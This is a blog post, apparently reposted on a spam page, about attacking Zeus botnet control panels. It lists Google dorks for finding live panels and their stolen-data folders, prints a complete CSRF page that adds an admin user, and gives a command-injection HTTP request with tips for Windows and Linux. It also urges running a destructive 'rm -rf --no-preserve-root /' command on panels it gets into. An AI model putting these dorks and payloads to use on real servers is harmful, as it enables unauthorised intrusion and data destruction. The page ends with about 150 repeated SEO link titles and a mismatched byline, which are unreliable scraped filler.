Monday, January 22, 2024

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html>
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
    • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler: 
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Related news


  1. Hacking Tools 2020
  2. Hacking Tools For Windows
  3. Hacking Tools For Windows Free Download
  4. Hacker Tools Github
  5. Pentest Automation Tools
  6. Hacker Tools Hardware
  7. Pentest Tools Apk
  8. Pentest Tools Linux
  9. Tools 4 Hack
  10. Pentest Tools Bluekeep
  11. Hacker Tools Free Download
  12. Pentest Tools Port Scanner
  13. Hacker Tools Mac
  14. Hacker Tools
  15. What Is Hacking Tools
  16. Pentest Tools For Mac
  17. Pentest Tools Review
  18. Pentest Tools Framework
  19. Pentest Tools Online
  20. Hack Apps
  21. Best Hacking Tools 2020
  22. Pentest Box Tools Download
  23. Hacking Tools For Windows 7
  24. Hacking Tools Hardware
  25. Hak5 Tools
  26. Hacker
  27. Pentest Tools Kali Linux
  28. Hacking Tools For Beginners
  29. Hack Tool Apk
  30. Hacking Tools
  31. Hacker Tools For Ios
  32. Hacker Search Tools
  33. Physical Pentest Tools
  34. Hack App
  35. Hacking App
  36. Pentest Tools Online
  37. Pentest Tools Port Scanner
  38. Hacker Techniques Tools And Incident Handling
  39. Hacking Tools Hardware
  40. Pentest Tools Website
  41. Pentest Tools Find Subdomains
  42. Underground Hacker Sites
  43. Hacking Tools 2020
  44. Hacking Tools Windows
  45. Blackhat Hacker Tools
  46. Hacking Tools 2019
  47. Install Pentest Tools Ubuntu
  48. Pentest Tools Windows
  49. Pentest Tools Review
  50. Black Hat Hacker Tools
  51. Free Pentest Tools For Windows
  52. Kik Hack Tools
  53. Hacking App
  54. Hacker Tools Linux
  55. Pentest Tools Nmap
  56. Pentest Tools Subdomain
  57. Pentest Tools Bluekeep
  58. Pentest Tools Kali Linux
  59. What Is Hacking Tools
  60. Best Hacking Tools 2019
  61. Hacker Techniques Tools And Incident Handling
  62. Hack Tools For Games
  63. Pentest Tools Download
  64. Install Pentest Tools Ubuntu
  65. Beginner Hacker Tools
  66. Best Hacking Tools 2019
  67. Hack Tools Github
  68. Pentest Tools Website
  69. Hak5 Tools
  70. Hack Tools Mac
  71. Pentest Tools For Windows
  72. Hacking Tools 2020
  73. Physical Pentest Tools
  74. Pentest Tools For Mac
  75. Hacker Tools
  76. Termux Hacking Tools 2019
  77. Hacker Tools Hardware
  78. Best Hacking Tools 2020
  79. What Are Hacking Tools
  80. Hack Tools For Windows
  81. Pentest Tools Url Fuzzer
  82. Pentest Tools For Windows
  83. Hacker Tools For Windows
  84. Pentest Reporting Tools
  85. Hack Tools Download
  86. Hacking Tools Windows
  87. Pentest Tools Github
  88. Pentest Tools Download
  89. Hacking Tools Windows
  90. How To Install Pentest Tools In Ubuntu
  91. Hack Tools For Mac
  92. Pentest Tools List
  93. New Hacker Tools
  94. Pentest Tools Website
  95. Hacker Tools For Mac
  96. Hacker Tools 2019
  97. Ethical Hacker Tools
  98. Wifi Hacker Tools For Windows
  99. Hacking Tools Windows
  100. Hack Tools
  101. Pentest Tools For Android
  102. Pentest Tools Alternative
  103. Hacking Tools And Software
  104. How To Hack
  105. Hacking Tools Windows
  106. Hack Tools For Games
  107. Physical Pentest Tools
  108. Pentest Tools Free
  109. Hacking Tools Name
  110. Pentest Tools Framework
  111. Hack Tool Apk No Root
  112. Hacker Search Tools
  113. Hack Tool Apk No Root
  114. Hack Rom Tools
  115. Pentest Tools Website
  116. Pentest Tools Alternative
  117. Hacking Tools For Windows
  118. Hacker Tools 2019
  119. Hacker Tools List
  120. Best Hacking Tools 2020
  121. Pentest Tools Review
  122. Hacker Hardware Tools
  123. Hacker
  124. Hacker Tools Hardware
  125. How To Hack
  126. Hacking Tools Mac
  127. What Is Hacking Tools
  128. Physical Pentest Tools
  129. Hacker Security Tools
  130. What Are Hacking Tools
  131. Best Pentesting Tools 2018
  132. What Are Hacking Tools
  133. Hack Tools 2019
  134. Hacking Tools
  135. Hack Tool Apk No Root
  136. Computer Hacker
  137. Hacking Tools For Windows
  138. Game Hacking
  139. Hack Tools 2019
  140. Pentest Recon Tools
  141. Hacking Tools For Windows 7
  142. Nsa Hacker Tools
  143. Pentest Tools Find Subdomains
  144. Hacking Apps
  145. New Hack Tools
  146. Hacker Tools Linux
  147. Hacker Tools For Pc
  148. Hacking Tools Usb
  149. Github Hacking Tools
Posted by Steve Freant Concrete 2 Concrete recycling

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)